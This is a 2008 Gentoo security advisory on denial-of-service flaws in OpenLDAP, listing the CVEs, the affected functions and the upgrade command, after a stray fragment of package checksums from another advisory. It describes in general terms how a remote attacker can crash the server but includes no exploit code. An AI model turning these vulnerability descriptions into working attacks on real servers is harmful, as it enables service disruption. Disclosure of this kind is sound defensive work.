cc8122a1c6a3449fc41d3022bbdffeb2 2008.0/i586/libkrb53-devel-1.6.2-7.1mdv2008.0.i586.rpm d5e75835b35e81a3f7d038e501dabd1c 2008.0/i586/telnet-client-krb5-1.6.2-7.1mdv2008.0.i586.rpm 072b5ba782fbd1659ed8bd
[ GLSA 200803-28 ] OpenLDAP: Denial of Service vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200803-28 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: OpenLDAP: Denial of Service vulnerabilities Date: March 19, 2008 Bugs: #197446, #209677 ID: 200803-28 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple Denial of Service vulnerabilities have been reported in OpenLDAP. Background == OpenLDAP Software is an open source implementation of the Lightweight Directory Access Protocol. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-nds/openldap < 2.3.41 >= 2.3.41 Description === The following errors have been discovered in OpenLDAP: * Tony Blake discovered an error which exists within the normalisation of "objectClasses" (CVE-2007-5707). * Thomas Sesselmann reported that, when running as a proxy-caching server the "add_filter_attrs()" function in servers/slapd/overlay/pcache.c does not correctly NULL terminate "new_attrs" (CVE-2007-5708). * A double-free bug exists in attrs_free() in the file servers/slapd/back-bdb/modrdn.c, which was discovered by Jonathan Clarke (CVE-2008-0658). Impact == A remote attacker can cause a Denial of Serivce by sending a malformed "objectClasses" attribute, and via unknown vectors that prevent the "new_attrs" array from being NULL terminated, and via a modrdn operation with a NOOP (LDAP_X_NO_OPERATION) control. Workaround == There is no known workaround at this time. Resolution == All OpenLDAP users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-nds/openldap-2.3.41" References == [ 1 ] CVE-2007-5707 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5707 [ 2 ] CVE-2007-5708 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5708 [ 3 ] CVE-2008-0658 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0658 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200803-28.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFH4ZoCuhJ+ozIKI5gRAuZYAKCXAX4sXc39JTd83l6VwVfnHdMsZACfQVfi kTrjdz99Vifw47to09cOknQ= =0mt1 -END PGP SIGNATURE-
